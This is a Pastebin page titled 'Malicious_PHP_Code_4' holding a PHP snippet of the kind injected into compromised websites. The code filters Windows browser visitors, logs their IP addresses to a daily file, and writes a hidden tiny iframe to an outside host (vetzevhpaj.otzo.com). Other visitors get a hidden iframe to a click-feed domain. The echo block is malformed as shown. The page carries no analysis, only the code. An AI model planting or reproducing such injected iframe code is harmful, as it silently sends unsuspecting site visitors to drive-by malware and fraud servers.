Advertisement
kazu-sama

Malicious_PHP_Code_4

Feb 6th, 2013
323
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.53 KB | None | 0 0
  1. <?php
  2. error_reporting(0);
  3. $ip   = $_SERVER["REMOTE_ADDR"];
  4. $dr   = $_SERVER["DOCUMENT_ROOT"];
  5. $ua   = $_SERVER['HTTP_USER_AGENT'];
  6. $odbf = $dr . '/' . md5(date('m.d.y'), time() - 86400);
  7. if (file_exists($odbf))
  8.     @unlink($odbf);
  9. $dbf = $dr . '/' . md5(date('m.d.y'));
  10. if ((strpos($ua, 'Windows') !== false) && ((strpos($ua, 'MSIE') !== false) || (strpos($ua, 'Opera') !== false) || (strpos($ua, 'Firefox') !== false || (strpos($ua, 'Mozilla') !== false)) && (strpos(@file_get_contents($dbf), $ip) === false))) {
  11.     error_reporting(0);
  12.     echo (
  13.         if (document.getElementsByTagName('body')[0]){
  14.             iframer();
  15.         } else {
  16.             document.write("<iframe src='http://vetzevhpaj.otzo.com/nt/stats.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
  17.         }
  18.         function iframer(){
  19.             var f = document.createElement('iframe');f.setAttribute('src','http://vetzevhpaj.otzo.com/nt/stats.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
  20.             document.getElementsByTagName('body')[0].appendChild(f);
  21.         }
  22.     );
  23.     if ($fp = @fopen($dbf, "a")) {
  24.         fputs($fp, $ip . '|');
  25.         fclose($fp);
  26.     }
  27. } else
  28.     echo '<iframe style="visibility:hidden;position:absolute;left:0;top:0;" width="100" height="6" src="http://click.rndtrg.com/feed/frames.php?uid=99&frames=2"></iframe>';
  29. if (file_exists("openinfo.php") OR isset($_REQUEST['dblink']) OR empty($dblink))
  30.     die("Cannot open file.");
  31. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement